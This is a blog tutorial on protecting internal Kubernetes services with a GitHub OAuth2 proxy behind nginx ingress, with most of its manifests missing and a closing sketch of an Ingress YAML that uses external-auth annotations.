Using kube-lego for configuring Let’s Encrypt certificates is deprecated now. Consider using cert-manager instead. Initially, when I was writing this post, I was using an old version of nginx, 0.9.0, because it did not work correctly on newer versions. Now I have found the problem, and it has been fixed in the 0.18.0 release. But the ingress exposing private services should be updated (more details): First of all, we need a Kubernetes cluster. I will use a newly created cluster in Google Cloud Platform with version 1.8.10-gke.0. If you have a cluster with configured ingress and https you can skip this step. Then we need to install nginx ingress and kube-lego. Let’s do it using helm: without RBAC: After it’s installed we can retrieve the controller IP address: and create a DNS record to point our domain and subdomains to this IP address. Let’s run a simple HTTP server as a service and expose it using nginx ingress: example-ing.yaml Wait for a few seconds, then open https://service.example.com and you should see something similar to this: In this post, we will use GitHub accounts for authentication.

So, go to https://github.com/settings/applications/new and create a new OAuth application. Fill the Authorization callback URL field with https://auth.example.com/oauth2/callback where example.com is your domain name. After creating the application you will have a Client ID and Client Secret which we will need in the next step. There are a lot of docker images for the OAuth proxy, but we cannot use them because they do not support domain white-listing. The problem is that such functionality has not been implemented yet. Actually there are several PRs that solve that problem, but they seem to be frozen for an unknown amount of time. So, the only thing I could do was merge one of the PRs into the current master and build my own image. You also can use my image, but if you worry about security, just clone my fork and build the image yourself. Let’s create a namespace and set it as current: oauth-proxy.deployment.yml oauth-service.yml oauth-ing.yml You can update the ingress that we used while configuring nginx-ingress or create a new one: example-ing.yml Then visit service.example.com and you will be redirected to the GitHub authorization page: And once you authenticate, you will have access to all your services under the ingress that points to auth.example.com until the cookie expires. And that’s it! Now you can put any of your internal services behind ingress with OAuth.

Here is a list of resources that helped me go through this process the first time:

- https://eng.fromatob.com/post/2017/02/lets-encrypt-oauth-2-and-kubernetes-ingress/
- https://www.midnightfreddie.com/oauth2-proxy.html
- https://thenewstack.io/single-sign-on-for-kubernetes-dashboard-experience/
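The manifests referenced in the post (example-ing.yml and friends) are missing from this copy. The usual pattern for putting a service behind the proxy with the nginx ingress controller is a pair of auth annotations on the service’s ingress; a sketch, using this post’s example hostnames (annotation keys vary between controller versions, so check the version you run):

```yaml
# Sketch: protect an internal service with the oauth2 proxy via
# nginx-ingress external-auth annotations.
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: kibana
  annotations:
    # Every request is first checked against the proxy's /oauth2/auth
    # endpoint; unauthenticated users are sent to /oauth2/start.
    nginx.ingress.kubernetes.io/auth-url: "https://auth.example.com/oauth2/auth"
    nginx.ingress.kubernetes.io/auth-signin: "https://auth.example.com/oauth2/start?rd=$scheme://$host$request_uri"
spec:
  rules:
    - host: kibana.example.com
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: kibana
                port:
                  number: 5601
```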
